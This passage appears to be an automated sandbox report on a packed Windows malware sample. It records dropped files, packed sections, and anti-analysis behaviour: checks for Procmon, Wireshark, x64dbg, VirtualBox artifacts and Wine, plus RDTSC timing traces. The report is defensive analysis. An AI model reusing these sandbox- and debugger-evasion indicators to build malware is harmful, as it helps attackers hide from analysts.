                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\es5qBEFupj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: es5qBEFupj.exeStatic file information: File size 7114240 > 1048576
                Source: es5qBEFupj.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x518a00
                Source: es5qBEFupj.exeStatic PE information: Raw size of ggsvuvii is bigger than: 0x100000 < 0x1ab600

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\es5qBEFupj.exeUnpacked PE file: 0.2.es5qBEFupj.exe.340000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ggsvuvii:EW;bfvlwstb:EW;.taggant:EW; vs :ER;.rsrc:W;
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,7_2_00406328
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: PasoCattle.exe.0.drStatic PE information: real checksum: 0x102e74 should be: 0x10b21d
                Source: es5qBEFupj.exeStatic PE information: real checksum: 0x6d86c7 should be: 0x6d8d0b
                Source: es5qBEFupj.exeStatic PE information: section name:
                Source: es5qBEFupj.exeStatic PE information: section name: .idata
                Source: es5qBEFupj.exeStatic PE information: section name:
                Source: es5qBEFupj.exeStatic PE information: section name: ggsvuvii
                Source: es5qBEFupj.exeStatic PE information: section name: bfvlwstb
                Source: es5qBEFupj.exeStatic PE information: section name: .taggant
                Source: Set-up.exe.0.drStatic PE information: section name: .eh_fram
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0132D473 push esp; retn 0000h8_3_0132D4F5
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0132D473 push esp; retn 0000h8_3_0132D4F5
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_012FB390 pushad ; ret 8_3_012FB399
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130FE52 push ebx; ret 8_3_0130FEFA
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130FE52 push ebx; ret 8_3_0130FEFA
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_01315ADC pushad ; ret 8_3_01315ADD
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_01315ADC pushad ; ret 8_3_01315ADD
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0132D473 push esp; retn 0000h8_3_0132D4F5
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0132D473 push esp; retn 0000h8_3_0132D4F5
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_012FB390 pushad ; ret 8_3_012FB399
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130FE52 push ebx; ret 8_3_0130FEFA
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130FE52 push ebx; ret 8_3_0130FEFA
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_01315ADC pushad ; ret 8_3_01315ADD
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_01315ADC pushad ; ret 8_3_01315ADD
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0132D473 push esp; retn 0000h8_3_0132D4F5
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0132D473 push esp; retn 0000h8_3_0132D4F5
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_012FB390 pushad ; ret 8_3_012FB399
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130FE52 push ebx; ret 8_3_0130FEFA
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_0130FE52 push ebx; ret 8_3_0130FEFA
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_01315ADC pushad ; ret 8_3_01315ADD
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 8_3_01315ADC pushad ; ret 8_3_01315ADD
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_3_039C7121 push ecx; iretd 21_3_039C7122
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001002D8 push cs; retn 000Fh21_2_00100318
                Source: es5qBEFupj.exeStatic PE information: section name: ggsvuvii entropy: 7.953466652603566

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768400\Climb.comJump to dropped file
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile created: C:\Users\user\AppData\Local\Temp\Set-up.exeJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768400\Climb.comJump to dropped file
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile created: C:\Users\user\AppData\Local\Temp\PasoCattle.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\es5qBEFupj.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001426DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,21_2_001426DD
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000CFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,21_2_000CFC7C
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_21-105968
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: PROCMON.EXE
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: X64DBG.EXE
                Source: es5qBEFupj.exe, es5qBEFupj.exe, 00000000.00000003.1280366142.0000000005300000.00000004.00001000.00020000.00000000.sdmp, es5qBEFupj.exe, 00000000.00000002.1321366859.0000000000342000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SBIEDLL.DLL
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: WINDBG.EXE
                Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: WIRESHARK.EXE
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5AF31 second address: C5AF37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C549CA second address: C549D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C549D2 second address: C549D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C549D8 second address: C549DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C549DD second address: C549E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C549E3 second address: C549E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C549E9 second address: C549ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C549ED second address: C549F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C549F1 second address: C54A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8AF10CF426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jg 00007F8AF10CF426h 0x00000013 jmp 00007F8AF10CF438h 0x00000018 pop esi 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jc 00007F8AF10CF426h 0x00000025 jl 00007F8AF10CF426h 0x0000002b push edx 0x0000002c pop edx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C59E64 second address: C59E80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8AF15A7F5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C59E80 second address: C59E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C59E84 second address: C59E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F8AF15A7F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F8AF15A7F56h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5A2FB second address: C5A31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF437h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5A31A second address: C5A326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8AF15A7F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5A486 second address: C5A48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5A5C6 second address: C5A5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8AF15A7F64h 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5A5E1 second address: C5A5E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C38D second address: C5C44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 77EA983Ah 0x0000000c jmp 00007F8AF15A7F5Ch 0x00000011 or esi, 130B0FD2h 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122D340Ch], ecx 0x0000001f push 00000000h 0x00000021 xor dword ptr [ebp+122D34E6h], edx 0x00000027 push 00000003h 0x00000029 and edx, dword ptr [ebp+122D38C7h] 0x0000002f call 00007F8AF15A7F59h 0x00000034 jmp 00007F8AF15A7F68h 0x00000039 push eax 0x0000003a jmp 00007F8AF15A7F5Fh 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 jno 00007F8AF15A7F70h 0x00000049 mov eax, dword ptr [eax] 0x0000004b push esi 0x0000004c push esi 0x0000004d jmp 00007F8AF15A7F67h 0x00000052 pop esi 0x00000053 pop esi 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push esi 0x0000005b pop esi 0x0000005c pop eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F8AF15A7F5Bh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C44B second address: C5C48A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 add edx, dword ptr [ebp+122D396Fh] 0x0000000e lea ebx, dword ptr [ebp+124561DAh] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F8AF10CF428h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub si, D2E9h 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C48A second address: C5C494 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C494 second address: C5C498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C511 second address: C5C517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C517 second address: C5C51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C51B second address: C5C597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007F8AF15A7F6Eh 0x00000013 jmp 00007F8AF15A7F68h 0x00000018 push ecx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F8AF15A7F58h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 push ecx 0x00000039 mov esi, dword ptr [ebp+122D398Fh] 0x0000003f pop edx 0x00000040 mov esi, dword ptr [ebp+122D3B6Bh] 0x00000046 push 00000000h 0x00000048 movzx esi, si 0x0000004b push F42E327Ah 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C597 second address: C5C59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C59B second address: C5C5B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C5B9 second address: C5C65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 0BD1CE06h 0x0000000d mov edi, ebx 0x0000000f push 00000003h 0x00000011 jp 00007F8AF10CF429h 0x00000017 sub ch, FFFFFF99h 0x0000001a push 00000000h 0x0000001c jmp 00007F8AF10CF432h 0x00000021 push 00000003h 0x00000023 mov dl, cl 0x00000025 pushad 0x00000026 add esi, dword ptr [ebp+122D3B23h] 0x0000002c add dword ptr [ebp+122D2985h], esi 0x00000032 popad 0x00000033 push 98CAF2A1h 0x00000038 jmp 00007F8AF10CF430h 0x0000003d xor dword ptr [esp], 58CAF2A1h 0x00000044 jl 00007F8AF10CF42Ch 0x0000004a lea ebx, dword ptr [ebp+124561E3h] 0x00000050 add dword ptr [ebp+122D262Ch], esi 0x00000056 xchg eax, ebx 0x00000057 pushad 0x00000058 jc 00007F8AF10CF437h 0x0000005e jmp 00007F8AF10CF431h 0x00000063 jmp 00007F8AF10CF42Fh 0x00000068 popad 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d pushad 0x0000006e popad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C65E second address: C5C663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C5C786 second address: C5C7CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8AF10CF432h 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 74BD12A7h 0x00000017 movsx edx, di 0x0000001a mov dword ptr [ebp+122D3494h], ebx 0x00000020 lea ebx, dword ptr [ebp+124561EEh] 0x00000026 jmp 00007F8AF10CF42Ch 0x0000002b xchg eax, ebx 0x0000002c push edx 0x0000002d push esi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C6EA48 second address: C6EA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
